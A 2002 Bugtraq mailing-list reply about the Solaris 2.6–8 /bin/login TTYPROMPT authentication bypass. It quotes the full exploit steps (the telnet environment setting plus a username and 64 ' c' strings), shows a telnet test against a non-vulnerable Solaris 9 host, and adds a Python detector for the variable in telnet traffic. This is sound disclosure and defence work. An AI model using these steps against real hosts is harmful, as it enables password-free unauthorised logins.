Bugtraq mailing list archives
Re: Solaris 2.6, 7, 8
From: Ido Dubrawsky <idubraws () cisco com>
Date: Wed, 2 Oct 2002 14:16:28 -0500
On Wed, Oct 02, 2002 at 12:13:09PM -0400, Jonathan S wrote:
> Hello, Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the environment variable TTYPROMPT. This vulnerability has already been reported to BugTraq and a patch has been released by Sun. However, a very simple exploit, which does not require any code to be compiled by an attacker, exists. The exploit requires the attacker to simply define the environment variable TTYPROMPT to a 6 character string, inside telnet. I believe this overflows an integer inside login, which specifies whether or not the user has been authenticated (just a guess). Once connected to the remote host, you must type the username, followed by 64 " c"s, and a literal "\n". You will then be logged in as the user without any password authentication. This should work with any account except root (unless remote root login is allowed).
Looks like Solaris 9 is not vulnerable to this:

[idubraws@elrond idubraws] 6 $ telnet
telnet> environ define TTYPROMPT abcdef
telnet> o 192.168.155.2
Trying 192.168.155.2...
Connected to 192.168.155.2.
Escape character is '^]'.

SunOS 5.9

login:

It automatically drops you to the login prompt. Perhaps this is fixed by a patch that got rolled into 9?

Ido
--
===============================================================================
Ido Dubrawsky                                 E-mail: idubraws () cisco com
Network Consulting Engineer
VSEC Technical Marketing, SAFE Architecture
Cisco Systems, Inc.
Austin, TX. 78759
===============================================================================
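
Added example, not part of the original message or of any Sun or Cisco code: a detection sketch for the `environ define TTYPROMPT` step discussed in this thread. It assumes the telnet client carries the variable to the server in the NEW-ENVIRON option (RFC 1572); the function names and the sample capture are constructed for illustration.

```python
import re

# Telnet framing bytes (RFC 854) and NEW-ENVIRON codes (RFC 1572).
IAC, SB, SE, NEW_ENVIRON = 255, 250, 240, 39
IS, INFO, VAR, VALUE, ESC, USERVAR = 0, 2, 0, 1, 2, 3
SUBNEG = re.compile(rb"\xff\xff|\xff\xfa(.)((?:[^\xff]|\xff\xff)*)\xff\xf0", re.S)

def subnegotiations(stream):
    """Yield (option, payload) for every IAC SB <option> ... IAC SE block."""
    for m in SUBNEG.finditer(stream):
        if m.group(1):                      # None for a bare IAC IAC (escaped 0xFF)
            yield m.group(1)[0], m.group(2).replace(b"\xff\xff", b"\xff")

def environ_vars(payload):
    """Decode a NEW-ENVIRON IS/INFO payload into {name: value}."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    tokens, k = [(None, bytearray())], 1    # first entry absorbs stray bytes
    while k < len(payload):
        b = payload[k]
        if b == ESC and k + 1 < len(payload):
            k += 1                          # ESC: the next byte is literal data
            tokens[-1][1].append(payload[k])
        elif b in (VAR, VALUE, USERVAR):
            tokens.append((b, bytearray()))
        else:
            tokens[-1][1].append(b)
        k += 1
    out, name = {}, None
    for kind, data in tokens[1:]:
        text = data.decode("latin-1")
        if kind != VALUE:
            name = text
        if name is not None:
            out[name] = text if kind == VALUE else ""
    return out

def ttyprompt_values(stream):
    """Return every TTYPROMPT value the client sent through NEW-ENVIRON."""
    seen = [environ_vars(p) for opt, p in subnegotiations(stream) if opt == NEW_ENVIRON]
    return [v["TTYPROMPT"] for v in seen if "TTYPROMPT" in v]

# Constructed client-to-server bytes: IAC WILL NEW-ENVIRON, then the variable.
SAMPLE = (bytes([IAC, 251, NEW_ENVIRON])
          + bytes([IAC, SB, NEW_ENVIRON, IS, USERVAR]) + b"TTYPROMPT"
          + bytes([VALUE]) + b"abcdef" + bytes([IAC, SE]) + b"someuser\r\n")
```

Run `ttyprompt_values` over the reassembled client-to-server bytes of a telnet session; a non-empty result on a connection to an unpatched Solaris 2.6, 7 or 8 host is worth reviewing alongside the login records for that session.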